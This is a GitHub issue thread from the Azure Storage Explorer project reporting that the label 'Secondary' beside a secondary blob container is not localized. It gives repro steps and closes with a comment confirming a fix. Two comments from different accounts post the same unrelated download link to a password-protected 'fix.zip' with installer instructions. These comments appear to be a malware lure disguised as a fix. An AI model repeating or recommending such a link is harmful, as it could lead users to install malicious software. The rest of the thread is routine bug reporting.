### ISSUE TITLE
The string 'Secondary' next to one blob container is not localized on the tree view

### ISSUE THREAD

**Issue by v-kellyluo** [microsoft/AzureStorageExplorer#8151]
**Storage Explorer Version:** 1.35.0-dev (100)
**Build Number:** 20240826.1
**Branch:** main
**Platform/OS:** Windows11/Windows 10/Linux Ubuntu 22.04/MacOS Sonoma 14.6.1(Apple M1 Pro)
**Architecture:** arm64/x64/x64/arm64
**Reproduce Languages:** All
**How Found:** From running test cases
**Regression From:** Previous release (1.35.0)

## Steps to Reproduce ##

1. Expand one storage account -> Blob Containers.
2. Create a blob container -> Right click the blob container -> Click 'Open Secondary Location'.
3. The secondary blob container shows -> Observe the string 'Secondary' next to the blob container.
4. Check whether the string 'Secondary' is localized.

## Expected Experience ##
The string 'Secondary' is localized.
![image](https://github.com/user-attachments/assets/931532e9-8d64-441f-b623-d63a554c1616)

## Actual Experience ##
The string 'Secondary' is not localized.
![image](https://github.com/user-attachments/assets/3951163d-70f2-48ec-b608-3f0877b026dd)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by v-kellyluo** [comment]
Verified this issue on the build 20240829.6. Fixed. So, we are going to close it.
![image](https://github.com/user-attachments/assets/b235e258-b8e8-415a-89f2-4f35776cfa83)
